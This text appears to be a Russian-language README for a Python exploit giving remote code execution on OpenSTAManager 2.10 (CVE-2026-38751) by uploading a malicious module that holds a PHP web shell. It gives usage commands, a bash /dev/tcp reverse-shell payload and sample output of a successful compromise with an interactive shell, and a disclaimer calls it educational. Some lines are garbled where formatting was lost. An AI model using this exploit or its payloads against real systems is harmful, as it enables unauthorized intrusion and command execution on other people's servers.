
OpenSTAManager RCE Exploit (CVE-2026-38751)
Этот Python-скрипт эксплуатирует уязвимость удаленного выполнения кода в OpenSTAManager версии 2.10, идентифицированную как CVE-2026-38751. Эксплойт позволяет аутентифицированным пользователям загрузить вредоносный модуль и выполнить произвольные команды на целевой системе.
Эксплойт выполняет следующие шаги:
MODULE)shell.php), который выполняет команды через GET-параметр crequests, zipfilepython3 exploit.py -u http://target.com -U admin -P password
python3 exploit.py -u http://target.com -U admin -P password --interactive
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
shell/MODULE: Файл конфигурации модуляshell/shell.php: PHP-веб-шелл, выполняющий команды, переданные через GET-параметр cid, чтобы подтвердить его работоспособностьЭксплойт пытается использовать несколько полезных нагрузок обратного шелла:
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1⚠️ Отказ от ответственности: Данный эксплойт предназначен только для образовательных и авторизованных целей тестирования безопасности.
Эта уязвимость позволяет:
Для защиты от этой уязвимости:
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
Этот эксплойт предоставляется только в образовательных целях. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете явного разрешения, является незаконным.
| Аргумент | Описание |
|---|
-u, --url | Целевой URL (обязательный) |
-U, --user | Имя пользователя для аутентификации (обязательный) |
-P, --password | Пароль для аутентификации (обязательный) |
--interactive | Войти в интерактивный режим шелла |
--no-cleanup | Не удалять файлы шелла после выполнения |
--lhost | Локальный хост для обратного шелла |
--lport | Локальный порт для обратного шелла |